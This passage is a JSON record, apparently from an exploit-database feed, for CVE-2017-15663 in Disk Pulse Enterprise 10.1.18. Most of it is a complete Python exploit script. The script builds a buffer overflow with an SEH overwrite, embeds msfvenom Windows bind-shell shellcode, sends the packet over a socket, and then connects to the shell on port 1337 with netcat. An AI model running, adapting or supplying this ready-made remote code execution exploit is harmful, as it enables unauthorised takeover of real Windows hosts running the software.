"AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-04-01T19:04:12", "description": "\nDisk Pulse Enterprise 10.1.18 - Remote Buffer Overflow", "edition": 1, "published": "2018-01-15T00:00:00", "title": "Disk Pulse Enterprise 10.1.18 - Remote Buffer Overflow", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-15663"], "modified": "2018-01-15T00:00:00", "id": "EXPLOITPACK:BDDF2149B6E579033DBF5F7F9437164D", "href": "", "sourceData": "# Exploit Title: Disk Pulse Enterprise Server v10.1.18 - Buffer Overflow\n# Exploit Author: Ahmad Mahfouz \n# Description: Disk Pule Enterprise Server Unauthenticated Remote Buffer Overflow SEH\n# Contact: http://twitter.com/eln1x\n# Date: 12/01/2018\n# CVE: CVE-2017-15663\n# Version: v10.1.18 \n# Tested on: Windows 7 x64\n# Software Link: http://www.diskpulse.com/setups/diskpulsesrv_setup_v10.1.18.exe\n\n \n\nfrom struct import pack\nfrom os import system\nfrom sys import exit\nfrom time import sleep\nimport socket\n\n \n\nport = 9120\nhost = '192.168.72.231'\n\n\nstage1 = \"\\x83\\xc4\\x7f\" *17 # metasm > add esp,127\nstage1 += \"\\x83\\xc4\\x04\"\u00a0\u00a0\u00a0 # metasm > add esp,4\nstage1 +=\u00a0 \"\\xff\\xe4\"\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # metasm > jmp esp\n# msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=1337 -f py -b '\\x02'\n\nbuf =\u00a0 \"\\x90\" * 10 \nbuf += \"\\xb8\\x01\\x69\\xed\\x6f\\xdd\\xc3\\xd9\\x74\\x24\\xf4\\x5a\\x31\"\nbuf += \"\\xc9\\xb1\\x53\\x31\\x42\\x12\\x83\\xea\\xfc\\x03\\x43\\x67\\x0f\"\nbuf += \"\\x9a\\xbf\\x9f\\x4d\\x65\\x3f\\x60\\x32\\xef\\xda\\x51\\x72\\x8b\"\nbuf += \"\\xaf\\xc2\\x42\\xdf\\xfd\\xee\\x29\\x8d\\x15\\x64\\x5f\\x1a\\x1a\"\nbuf += \"\\xcd\\xea\\x7c\\x15\\xce\\x47\\xbc\\x34\\x4c\\x9a\\x91\\x96\\x6d\"\nbuf += \"\\x55\\xe4\\xd7\\xaa\\x88\\x05\\x85\\x63\\xc6\\xb8\\x39\\x07\\x92\"\nbuf += \"\\x00\\xb2\\x5b\\x32\\x01\\x27\\x2b\\x35\\x20\\xf6\\x27\\x6c\\xe2\"\nbuf += \"\\xf9\\xe4\\x04\\xab\\xe1\\xe9\\x21\\x65\\x9a\\xda\\xde\\x74\\x4a\"\nbuf += \"\\x13\\x1e\\xda\\xb3\\x9b\\xed\\x22\\xf4\\x1c\\x0e\\x51\\x0c\\x5f\"\nbuf += \"\\xb3\\x62\\xcb\\x1d\\x6f\\xe6\\xcf\\x86\\xe4\\x50\\x2b\\x36\\x28\"\nbuf += \"\\x06\\xb8\\x34\\x85\\x4c\\xe6\\x58\\x18\\x80\\x9d\\x65\\x91\\x27\"\nbuf += \"\\x71\\xec\\xe1\\x03\\x55\\xb4\\xb2\\x2a\\xcc\\x10\\x14\\x52\\x0e\"\nbuf += \"\\xfb\\xc9\\xf6\\x45\\x16\\x1d\\x8b\\x04\\x7f\\xd2\\xa6\\xb6\\x7f\"\nbuf += \"\\x7c\\xb0\\xc5\\x4d\\x23\\x6a\\x41\\xfe\\xac\\xb4\\x96\\x01\\x87\"\nbuf += \"\\x01\\x08\\xfc\\x28\\x72\\x01\\x3b\\x7c\\x22\\x39\\xea\\xfd\\xa9\"\nbuf += \"\\xb9\\x13\\x28\\x47\\xb1\\xb2\\x83\\x7a\\x3c\\x04\\x74\\x3b\\xee\"\nbuf += \"\\xed\\x9e\\xb4\\xd1\\x0e\\xa1\\x1e\\x7a\\xa6\\x5c\\xa1\\x81\\x0e\"\nbuf += \"\\xe8\\x47\\xe3\\x60\\xbc\\xd0\\x9b\\x42\\x9b\\xe8\\x3c\\xbc\\xc9\"\nbuf += \"\\x40\\xaa\\xf5\\x1b\\x56\\xd5\\x05\\x0e\\xf0\\x41\\x8e\\x5d\\xc4\"\nbuf += \"\\x70\\x91\\x4b\\x6c\\xe5\\x06\\x01\\xfd\\x44\\xb6\\x16\\xd4\\x3e\"\nbuf += \"\\x5b\\x84\\xb3\\xbe\\x12\\xb5\\x6b\\xe9\\x73\\x0b\\x62\\x7f\\x6e\"\nbuf += \"\\x32\\xdc\\x9d\\x73\\xa2\\x27\\x25\\xa8\\x17\\xa9\\xa4\\x3d\\x23\"\nbuf += \"\\x8d\\xb6\\xfb\\xac\\x89\\xe2\\x53\\xfb\\x47\\x5c\\x12\\x55\\x26\"\nbuf += \"\\x36\\xcc\\x0a\\xe0\\xde\\x89\\x60\\x33\\x98\\x95\\xac\\xc5\\x44\"\nbuf += \"\\x27\\x19\\x90\\x7b\\x88\\xcd\\x14\\x04\\xf4\\x6d\\xda\\xdf\\xbc\"\nbuf += \"\\x9e\\x91\\x7d\\x94\\x36\\x7c\\x14\\xa4\\x5a\\x7f\\xc3\\xeb\\x62\"\nbuf += \"\\xfc\\xe1\\x93\\x90\\x1c\\x80\\x96\\xdd\\x9a\\x79\\xeb\\x4e\\x4f\"\nbuf += \"\\x7d\\x58\\x6e\\x5a\"\n\nshellcode = buf\npayload = 'A' * 124\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 #offset\npayload +=\u00a0 '\\xeb\\x09\\x90\\x90'\u00a0 #jmp over seh retrun value\npayload +=\u00a0 '\\xcd\\x89\\x06\\x10' #0x100689cd : pop ebp # pop ebx # ret 0x04 |\u00a0 {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\\Program Files (x86)\\Disk Pulse Enterprise\\bin\\libspp.dll)\npayload += stage1 \npayload +=\u00a0 '\\x90' * (1000 - len(payload) - len(shellcode))\npayload += shellcode \n\n \n\nheader = '\\x75\\x19\\xba\\xab'\nheader += '\\x03\\x00\\x00\\x00'\nheader += '\\x00\\x40\\x00\\x00'\nheader += pack('<I', len(payload))\nheader += pack('<I', len(payload))\nheader += pack('<I', ord(payload[-1]))\npacket = header\npacket += payload \n\n \n\n \n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ntry:\n\n\u00a0\u00a0\u00a0 print \"[*] Testing connection to tatget %s:%s\" %(host,port)\n\u00a0\u00a0\u00a0 s.connect((host, port))\n\nexcept:\n\n\u00a0\u00a0\u00a0 print \"[-] Unable to communicate to target %s:%s\" %(host,port)\n\n\u00a0\u00a0\u00a0 exit()\n\n \n\ns.send(packet)\n\nprint \"[*] Payload Sent..\"\nprint \"[*] Connecting to bind shell %s:1337 ..\" %host\nsleep(3)\nsystem(\"nc %s 1337\"%host)", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}]}